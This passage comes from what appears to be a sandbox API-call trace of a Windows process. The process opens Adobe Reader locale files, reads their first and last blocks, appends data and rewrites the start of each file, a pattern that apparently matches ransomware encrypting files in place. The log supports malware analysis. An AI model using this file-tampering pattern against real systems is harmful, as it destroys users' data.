nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.466] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3800 [0072.466] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.466] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3800 [0072.466] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.467] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.467] WriteFile (in: hFile=0x1ec, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.467] CloseHandle (hObject=0x1ec) returned 1 [0072.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\accessibility.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\accessibility.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.475] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.475] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb600 [0072.475] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.476] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.476] ReleaseMutex (hMutex=0x168) returned 1 [0072.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.FRA", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.FRA", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.FRA", lpUsedDefaultChar=0x0) returned 17 [0072.476] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.487] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa600 [0072.488] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.488] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa600 [0072.488] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.489] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0072.489] WriteFile (in: hFile=0x1ec, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.489] CloseHandle (hObject=0x1ec) returned 1 [0072.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\eBook.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\ebook.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.490] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.491] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c00 [0072.491] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.491] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.492] ReleaseMutex (hMutex=0x168) returned 1 [0072.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.FRA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0072.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.FRA", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.FRA", lpUsedDefaultChar=0x0) returned 9 [0072.492] ReadFile (in: hFile=0x1ec, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0072.508] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0072.508] WriteFile (in: hFile=0x1ec, lpBuffer=0x2668668*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668668*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0072.509] CloseHandle (hObject=0x1ec) returned 1 [0072.510] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\ReadOutLoud.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\readoutloud.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0072.510] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.510] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0072.511] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0072.511] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.511] ReleaseMutex (hMutex=0x168) returned 1 [0072.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.FRA", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0072.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.FRA", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.FRA", lpUsedDefaultChar=0x0) returned 15 [0072.511] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.653] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0073.654] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.654] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0073.654] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.661] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0073.661] WriteFile (in: hFile=0x1ec, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.662] CloseHandle (hObject=0x1ec) returned 1 [0073.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\updater.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\updater.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0075.001] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.008] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0075.015] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.021] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.021] ReleaseMutex (hMutex=0x168) returned 1 [0075.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.FRA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.FRA", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.FRA", lpUsedDefaultChar=0x0) returned 11 [0075.026] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.028] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0075.028] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.029] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0075.029] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.030] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0075.030] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.031] CloseHandle (hObject=0x1bc) returned 1 [0075.031] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\DigSig.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\digsig.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0075.032] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.032] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1f200 [0075.032] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.033] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.033] ReleaseMutex (hMutex=0x168) returned 1 [0075.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.HRV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.HRV", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.HRV", lpUsedDefaultChar=0x0) returned 10 [0075.033] ReadFile (in: hFile=0x1bc, lpBuffer=0x286ef88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.035] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e200 [0075.036] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.036] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e200 [0075.037] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.037] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0075.037] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.037] CloseHandle (hObject=0x1bc) returned 1 [0075.038] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\PPKLITE.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\ppklite.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0075.038] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.038] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7e400 [0075.039] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.039] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.039] ReleaseMutex (hMutex=0x168) returned 1 [0075.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.HRV", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.HRV", lpUsedDefaultChar=0x0) returned 11 [0075.039] ReadFile (in: hFile=0x1bc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0075.041] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7d400 [0075.042] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.043] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7d400 [0075.044] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.044] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0075.044] WriteFile (in: hFile=0x1bc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0075.044] CloseHandle (hObject=0x1bc) returned 1 [0075.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe6 [0075.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.047] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.047] ReleaseMutex (hMutex=0x168) returned 1 [0075.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0075.047] ReadFile (in: hFile=0x1fc, lpBuffer=0x26bedf8, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bedf8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0075.048] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0075.048] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0075.049] CloseHandle (hObject=0x1fc) returned 1 [0075.049] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\BRdlang32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\brdlang32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.050] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.050] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3400 [0075.050] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.050] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.050] ReleaseMutex (hMutex=0x168) returned 1 [0075.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.HUN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.HUN", cchWideChar=13, lpMultiByteStr=0x1f7358c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.HUN", lpUsedDefaultChar=0x0) returned 13 [0075.051] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.052] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2400 [0075.052] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, 